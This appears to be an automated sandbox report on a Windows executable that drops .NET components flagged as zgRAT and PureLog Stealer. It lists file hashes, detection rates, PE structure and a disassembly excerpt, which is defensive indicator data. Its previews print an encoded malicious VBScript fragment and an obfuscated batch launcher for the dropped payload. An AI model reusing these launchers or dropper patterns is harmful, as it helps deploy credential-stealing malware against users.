                                                                        Preview:f9PW2HZ9q3KqhdvceHxWTdGoYWEfis322pqzxbGmHcY383vAjWpdfQEC2l7fC3b8ARx2x6pDBKO1EMqflE6MDZWmkn6LdkjNAa3qG3NmqlcUBN7q5c487P5k4KRJAdkakB0oT9Zs0Tfb7BlWpQQAqlPvfSv5lEmNBCu9XTW5DMHoudn2j4duNjt9vEJANdGwrSa4Rl9W3U7edlBBp3Wqk1AcSuOSKWsjFV6cCsl75G12lPfJDHVUHZL0R8mgXqMgmXYIpj86SYvdAH0CPEPDBXcqJGKEFEkP4UPN1XeeIYCsnrzJIkRSbIfP5s8jY40Oygjp2mL1kv5mVtCcQA6fwRxwzASIY5FNhy4HIKRfZasqN23MpgSY7Vbgsxz2UCcoprEhy5TFsaGVjHi
                                                                        Process:C:\Users\user\Desktop\ZZ2sTsJFrt.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):250
                                                                        Entropy (8bit):5.884569940385019
                                                                        Encrypted:false
                                                                        SSDEEP:6:GhwqK+NkLzWbHnPv7qK+NkLzWHzS1DIEZAdFxbk/ibs:G0MCzWLnP/MCzWTSlIE6dFJgi4
                                                                        MD5:AE6A0A68EBDA4FDADE2D5CBC8D021167
                                                                        SHA1:0BA547A388B43ACC2267773889F806C94400E47B
                                                                        SHA-256:26572387D0A9326F703F2465D689EF201A6F794184BBB59197484E69FA62D49D
                                                                        SHA-512:F5A65856E6FA2022914BB6566D715ED13897AB74695FA6C1CAD9012F27C07349746FBB7E381D79CF3D79A393568730D55F36DF26285729520B613757D382F3F8
                                                                        Malicious:true
                                                                        Preview:#@~^4QAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v!b@#@&j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.k4?4+sscIEU~r])wa9mYCuz4Xw.DUnD7+.AMWAd.DtKdYsWxbOGDJzhxrMdCt\C!q91y4/i!qx{XFLOH7KIn/nV5Wn2;x 4mYE~,!S~6lVkn80kAAA==^#~@.
                                                                        Process:C:\Users\user\Desktop\ZZ2sTsJFrt.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2008064
                                                                        Entropy (8bit):7.561218073847526
                                                                        Encrypted:false
                                                                        SSDEEP:49152:4Zxl12Ref9smYan+7TzjNWScGYDe9eq97DUczT:4DzKehnMhtXY6rZYc
                                                                        MD5:34EAB3FCCF84F6B9ABF20B49DB5FCF6E
                                                                        SHA1:BEF38B623BB9C1A88367325E54A759E37DC49A13
                                                                        SHA-256:48DD9601F2067474FA2CB66FE39798B6FE5AB41A51104E2A40247E473B082C2B
                                                                        SHA-512:4666A96BA8CAF17CD00CD8A54949457371013C5B864EB4394AA80A240A8EBC53855A04AD1D5477AA3BC3AAF8010F9B7AFE8A9E5302D6A21DD49944DAE0D36588
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 83%
                                                                        Process:C:\Users\user\Desktop\ZZ2sTsJFrt.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):126
                                                                        Entropy (8bit):4.912026001342963
                                                                        Encrypted:false
                                                                        SSDEEP:3:EtAi2KAyAzsUVnNqXcLxKLlMveKAXjGO7An:EtAi2APEdLxKLCQFAn
                                                                        MD5:FB0B04A6974BEDA6423AF39A98AEA748
                                                                        SHA1:2521E0560A9867C3857BFD6444B0177A3C726339
                                                                        SHA-256:11407A3EFF987EB89A4FC8CA6AAA5C7A92B1A3959E3ADF29DA6CFD9AA2684298
                                                                        SHA-512:3F4A39D4E631C1CFA6D37C95C72F701252BBDAEBEC06D126104DB093351083D3743E0B3DB1DCCC7E2770636B1FF73CDBBF60419FB7B3B8539A2CBFDE800B466D
                                                                        Malicious:false
                                                                        Preview:%PmcUxzK%%mpebQjujJfB%..%tbIrQjeiwmBIHOc%"%AppData%\hyperServerBrowserhostmonitor/HyperPortContainerproviderinto.exe"%oJjknPh%
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):33792
                                                                        Entropy (8bit):5.541771649974822
                                                                        Encrypted:false
                                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 38%
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):85504
                                                                        Entropy (8bit):5.8769270258874755
                                                                        Encrypted:false
                                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):23552
                                                                        Entropy (8bit):5.519109060441589
                                                                        Encrypted:false
                                                                        SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                        MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                        SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                        SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                        SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):23552
                                                                        Entropy (8bit):5.519109060441589
                                                                        Encrypted:false
                                                                        SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                        MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                        SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                        SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                        SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):85504
                                                                        Entropy (8bit):5.8769270258874755
                                                                        Encrypted:false
                                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):33792
                                                                        Entropy (8bit):5.541771649974822
                                                                        Encrypted:false
                                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 38%
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):32256
                                                                        Entropy (8bit):5.631194486392901
                                                                        Encrypted:false
                                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):5.645950918301459
                                                                        Encrypted:false
                                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):32256
                                                                        Entropy (8bit):5.631194486392901
                                                                        Encrypted:false
                                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):5.645950918301459
                                                                        Encrypted:false
                                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):69632
                                                                        Entropy (8bit):5.932541123129161
                                                                        Encrypted:false
                                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):69632
                                                                        Entropy (8bit):5.932541123129161
                                                                        Encrypted:false
                                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):55
                                                                        Entropy (8bit):4.306461250274409
                                                                        Encrypted:false
                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                        Malicious:false
                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                        Process:C:\Windows\System32\w32tm.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):151
                                                                        Entropy (8bit):4.843346679571959
                                                                        Encrypted:false
                                                                        SSDEEP:3:VLV993J+miJWEoJ8FXDfHLMQf2fHJGKvow0XXKvj:Vx993DEU2LRIJG1ZX8
                                                                        MD5:47A7D42F8F6D551AC36D304CE0CC43D5
                                                                        SHA1:13C248C87DA51B9EBEC60F0BA0A6C858ACAB2634
                                                                        SHA-256:3ABA836BB7650C3FA12A0C9FC54BF5B64026A27764EF33566CF5B55DDB68468A
                                                                        SHA-512:26F6FD8675D7AC565672251EF9C54DF5AE1DCCBFB633AF5341A7F0B5C21A6A90CE4397F08DC6675C27ABD37F5C8E33DA364E810A91C1165A17C7824AEB696525
                                                                        Malicious:false
                                                                        Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 28/12/2024 15:45:57..15:45:57, error: 0x80072746.15:46:02, error: 0x80072746.
                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.5000926558660215
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:ZZ2sTsJFrt.exe
                                                                        File size:2'330'001 bytes
                                                                        MD5:403138422d8da9fdd31fe147959a1403
                                                                        SHA1:913139b08964bc2039eeeea9f491c5c8507b7dcc
                                                                        SHA256:4b1a5d38d7741fea74f2cf45d5b215955ba9fe117d6f6a0e7ecbef64118c449b
                                                                        SHA512:3aec241bc828aa7878a632e9e44e3c7daf982e4c412efc499c40e04b88d48b9c2c62e01f00b014ea57148623d022e8c96a3d240b67df5045b746c4b0198e9afb
                                                                        SSDEEP:49152:IBJ7Zxl12Ref9smYan+7TzjNWScGYDe9eq97DUczTG:ypDzKehnMhtXY6rZYcG
                                                                        TLSH:9DB5BF1675A24E72C3A41B335657023D42A0E7223D66EF0B375F2196AD17BF18E722B3
                                                                        Icon Hash:1515d4d4442f2d2d
                                                                        Entrypoint:0x41f530
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:5
                                                                        OS Version Minor:1
                                                                        File Version Major:5
                                                                        File Version Minor:1
                                                                        Subsystem Version Major:5
                                                                        Subsystem Version Minor:1
                                                                        Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                                        Instruction
                                                                        call 00007F0F7168EC0Bh
                                                                        jmp 00007F0F7168E51Dh
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        push esi
                                                                        push dword ptr [ebp+08h]
                                                                        mov esi, ecx
                                                                        call 00007F0F71681367h
                                                                        mov dword ptr [esi], 004356D0h
                                                                        mov eax, esi
                                                                        pop esi
                                                                        pop ebp
                                                                        retn 0004h
                                                                        and dword ptr [ecx+04h], 00000000h
                                                                        mov eax, ecx
                                                                        and dword ptr [ecx+08h], 00000000h
                                                                        mov dword ptr [ecx+04h], 004356D8h
                                                                        mov dword ptr [ecx], 004356D0h
                                                                        ret
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        push esi
                                                                        mov esi, ecx
                                                                        lea eax, dword ptr [esi+04h]
                                                                        mov dword ptr [esi], 004356B8h
                                                                        push eax
                                                                        call 00007F0F716919AFh
                                                                        test byte ptr [ebp+08h], 00000001h
                                                                        pop ecx
                                                                        je 00007F0F7168E6ACh
                                                                        push 0000000Ch
                                                                        push esi
                                                                        call 00007F0F7168DC69h
                                                                        pop ecx
                                                                        pop ecx
                                                                        mov eax, esi
                                                                        pop esi
                                                                        pop ebp
                                                                        retn 0004h
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        sub esp, 0Ch
                                                                        lea ecx, dword ptr [ebp-0Ch]
                                                                        call 00007F0F716812E2h
                                                                        push 0043BEF0h
                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                        push eax
                                                                        call 00007F0F71691469h
                                                                        int3
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        sub esp, 0Ch
                                                                        lea ecx, dword ptr [ebp-0Ch]
                                                                        call 00007F0F7168E628h
                                                                        push 0043C0F4h
                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                        push eax
                                                                        call 00007F0F7169144Ch
                                                                        int3
                                                                        jmp 00007F0F71692EE7h
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        push 00422900h
                                                                        push dword ptr fs:[00000000h]
                                                                        Programming Language:
                                                                        • [ C ] VS2008 SP1 build 30729
                                                                        • [IMP] VS2008 SP1 build 30729
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x3d070          0x34          .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT          0x3d0a4          0x50          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x64000          0xdff8        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x72000          0x233c        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x3b11c          0x54          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x355f8          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x33000          0x278         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x3c5ec          0x120         .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x31bdc | 0x31c00 | 2831bb8b11e3209658a53131886cdf98 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x33000 | 0xaec0 | 0xb000 | 042f11346230ca5aa360727d9908e809 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x24720 | 0x1000 | 9670b581969e508258d8bc903025de5e | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x63000 | 0x190 | 0x200 | c83554035c63bb446c6208d0c8fa0256 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x64000 | 0xdff8 | 0xe000 | ba08fbcd0ed7d9e6a268d75148d9914b | False | 0.6373639787946429 | data | 6.638661032196024 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x72000 | 0x233c | 0x2400 | 40b5e17755fd6fdd34de06e5cdb7f711 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x64650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x65198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x66748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
RT_ICON | 0x66cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
RT_ICON | 0x67558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
RT_ICON | 0x68400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
RT_ICON | 0x68868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
RT_ICON | 0x69910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
RT_ICON | 0x6beb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
RT_DIALOG | 0x70588 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x70358 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x70498 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x70228 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x6fef0 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x6fc98 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x70f68 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x71150 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x71320 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x714d8 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x71620 | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x71a90 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x71bf8 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x71d50 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x71e60 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x71f20 | 0xd6 | data | English | United States | 0.5747663551401869
RT_GROUP_ICON | 0x6fc30 | 0x68 | data | English | United States | 0.7019230769230769
RT_MANIFEST | 0x70810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Import
